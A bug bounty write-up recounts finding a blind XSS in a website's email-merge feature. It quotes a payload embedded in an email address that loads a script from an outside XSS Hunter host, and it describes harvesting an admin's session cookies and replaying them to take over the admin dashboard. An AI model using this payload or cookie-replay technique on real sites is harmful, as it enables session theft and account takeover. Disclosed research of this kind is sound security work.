Blind XSS in Email Field; 1000$ bounty

Where there is blind-xss, There always is xsshunter!

I was testing a website that was built on PHP, The website had a limited program where they would pay $500–$1000 for high and critical vulnerabilities only, therefore small issues like username enumeration and other bypasses were out of scope. I started enumerating the website for subdomains using assetfinder, sublist3r and gobuster but did not find anything interesting. Then I tried directory bruteforcing and an /admin path returned the status-code 200.

When I visited the page, the admin login dashboard appeared, I tried different sort of attacks but all in vain. All I got was that the admin panel was prone to username enumeration. So I shifted my focus and started testing for XSS, for which I use xsshunter which is ;

XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.

So, I came across a feature on the website called, Email-Merge request , where if I had two accounts, I was able to merge them upon admin approval, I tried seeing if “<script>alert(1)</script>”@xyz.com was being accepted or not, and it returned account-not-found error. So I fired up my burp collaborator and copied the address then I crafted my payload as:
“><script src=https://xyz.xss.ht></script>”@subdomain.burpcollaborator.net
I signed up using the above email, and verified my email using the link I received on my collaborator, (Yes we can use burp for temporary emails as well ;-) )after which I initiated an email request and continued my testing, during which I found that session cookies weren’t httpOnly which means, If I get the XSS , I get the session as well.

5 minutes later; XSS Hunter did it’s magic and an email came into my inbox, revealing all the current merge requests which is a clear breach of other customer’s data. Along with it , came IP address of the client, as well as their cookies. And My face lit up like :

So I pasted the cookies in my browser; using EditThisCookie extension and I was logged in the admin dashboard. I quickly reported the issue in the next 10 minutes. It was acknowledged immediately and fix was implemented the next day. It was classified as critical by the owner and I was awarded a bounty of $1000, although according to cvss 3.1 it was a high severity vulnerability with a cvss score of 8.1~8.8 but due to the fact that website has insufficient rate-limit protection I was able to convince the team that the chain would result in mass account takeovers with a strong foothold, so they happily classified it as critical.